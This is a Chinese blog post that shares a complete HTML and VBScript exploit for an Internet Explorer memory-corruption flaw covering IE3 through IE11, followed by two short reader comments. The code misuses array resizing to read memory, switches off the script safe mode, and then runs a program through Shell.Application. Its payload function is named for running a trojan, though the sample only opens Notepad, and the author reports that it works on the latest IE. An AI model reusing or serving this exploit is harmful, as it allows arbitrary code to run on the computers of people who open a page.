win95+ie3-win10+ie11 浏览器执行漏洞

网络安全 阅读 2456
  1. //*  
  2.    allie(win95+ie3-win10+ie11) dve     
  3. *//  
  4.    
  5. <!doctype html>  
  6. <html>  
  7. <meta http-equiv=“X-UA-Compatible” content=“IE=EmulateIE8” >  
  8. <head>  
  9. </head>  
  10. <body>  
  11.    
  12. <SCRIPT LANGUAGE=“VBScript”>  
  13.    
  14. function runmumaa()   
  15. On Error Resume Next  
  16. set shell=createobject(“Shell.Application”)  
  17. shell.ShellExecute “notepad.exe”  
  18. end function  
  19.    
  20. </script>  
  21.    
  22. <SCRIPT LANGUAGE=“VBScript”>  
  23.     
  24. dim   aa()  
  25. dim   ab()  
  26. dim   a0  
  27. dim   a1  
  28. dim   a2  
  29. dim   a3  
  30. dim   win9x  
  31. dim   intVersion  
  32. dim   rnda  
  33. dim   funclass  
  34. dim   myarray  
  35.    
  36. Begin()  
  37.    
  38. function Begin()  
  39.   On Error Resume Next  
  40.   info=Navigator.UserAgent  
  41.    
  42.   if(instr(info,“Win64”)>0)   then  
  43.      exit   function  
  44.   end if  
  45.    
  46.   if (instr(info,“MSIE”)>0)   then   
  47.              intVersion = CInt(Mid(info, InStr(info, “MSIE”) + 5, 2))     
  48.   else  
  49.      exit   function    
  50.                 
  51.   end if  
  52.    
  53.   win9x=0  
  54.    
  55.   BeginInit()  
  56.   If Create()=True Then  
  57.      myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)  
  58.      myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)  
  59.    
  60.      if(intVersion<4) then  
  61.          document.write(“<br> IE”)  
  62.          document.write(intVersion)  
  63.          runshellcode()                      
  64.      else    
  65.           setnotsafemode()  
  66.      end if  
  67.   end if  
  68. end function  
  69.    
  70. function BeginInit()  
  71.    Randomize()  
  72.    redim aa(5)  
  73.    redim ab(5)  
  74.    a0=13+17*rnd(6)  
  75.    a3=7+3*rnd(5)  
  76. end function  
  77.    
  78. function Create()  
  79.   On Error Resume Next  
  80.   dim i  
  81.   Create=False  
  82.   For i = 0 To 400  
  83.     If Over()=True Then  
  84.     ‘   document.write(i)       
  85.        Create=True  
  86.        Exit For  
  87.     End If   
  88.   Next  
  89. end function  
  90.    
  91. sub testaa()  
  92. end sub  
  93.    
  94. function mydata()  
  95.     On Error Resume Next  
  96.      i=testaa  
  97.      i=null  
  98.      redim  Preserve aa(a2)    
  99.      
  100.      ab(0)=0  
  101.      aa(a1)=i  
  102.      ab(0)=6.36598737437801E-314  
  103.    
  104.      aa(a1+2)=myarray  
  105.      ab(2)=1.74088534731324E-310    
  106.      mydata=aa(a1)  
  107.      redim  Preserve aa(a0)    
  108. end function   
  109.    
  110.    
  111. function setnotsafemode()  
  112.     On Error Resume Next  
  113.     i=mydata()    
  114.     i=readmemo(i+8)  
  115.     i=readmemo(i+16)  
  116.     j=readmemo(i+&h134)    
  117.     for k=0 to &h60 step 4  
  118.         j=readmemo(i+&h120+k)  
  119.         if(j=14) then  
  120.               j=0            
  121.               redim  Preserve aa(a2)               
  122.      aa(a1+2)(i+&h11c+k)=ab(4)  
  123.               redim  Preserve aa(a0)    
  124.    
  125.      j=0   
  126.               j=readmemo(i+&h120+k)     
  127.             
  128.                Exit for  
  129.            end if  
  130.    
  131.     next   
  132.     ab(2)=1.69759663316747E-313  
  133.     runmumaa()   
  134. end function  
  135.    
  136. function Over()  
  137.     On Error Resume Next  
  138.     dim type1,type2,type3  
  139.     Over=False  
  140.     a0=a0+a3  
  141.     a1=a0+2  
  142.     a2=a0+&h8000000  
  143.      
  144.     redim  Preserve aa(a0)   
  145.     redim   ab(a0)       
  146.      
  147.     redim  Preserve aa(a2)  
  148.      
  149.     type1=1  
  150.     ab(0)=1.123456789012345678901234567890  
  151.     aa(a0)=10  
  152.              
  153.     If(IsObject(aa(a1-1)) = False) Then  
  154.        if(intVersion<4) then  
  155.            mem=cint(a0+1)*16               
  156.            j=vartype(aa(a1-1))  
  157.            if((j=mem+4) or (j*8=mem+8)) then  
  158.               if(vartype(aa(a1-1))<>0)  Then      
  159.                  If(IsObject(aa(a1)) = False ) Then               
  160.                    type1=VarType(aa(a1))  
  161.                  end if                 
  162.               end if  
  163.            else  
  164.              redim  Preserve aa(a0)  
  165.              exit  function  
  166.    
  167.            end if   
  168.         else  
  169.            if(vartype(aa(a1-1))<>0)  Then      
  170.               If(IsObject(aa(a1)) = False ) Then  
  171.                   type1=VarType(aa(a1))  
  172.               end if                 
  173.             end if  
  174.         end if  
  175.     end if  
  176.                  
  177.        
  178.     If(type1=&h2f66) Then           
  179.           Over=True        
  180.     End If    
  181.     If(type1=&hB9AD) Then  
  182.           Over=True  
  183.           win9x=1  
  184.     End If    
  185.    
  186.     redim  Preserve aa(a0)            
  187.            
  188. end function  
  189.    
  190. function ReadMemo(add)   
  191.     On Error Resume Next  
  192.     redim  Preserve aa(a2)    
  193.      
  194.     ab(0)=0     
  195.     aa(a1)=add+4       
  196.     ab(0)=1.69759663316747E-313         
  197.     ReadMemo=lenb(aa(a1))    
  198.       
  199.     ab(0)=0      
  200.     
  201.     redim  Preserve aa(a0)  
  202. end function  
  203.    
  204. </script>  
  205.    
  206. </body>  
  207. </html>  

最新ie下测试成功。

原创文章,作者:老D,如若转载,请注明出处:https://laod.cn/247.html

(0)
0 2
上一篇 2014-11-03 21:32
下一篇 2014-11-14 20:22

相关推荐

发表回复

登录后才能评论

评论列表(2条)

  • xsleaf
    xsleaf 2017-10-19 17:52

    点进来就提示病毒~~吼吼
    D好腻害

  • shaochenrui
    shaochenrui 2015-09-05 11:45

    这是什么意思呢?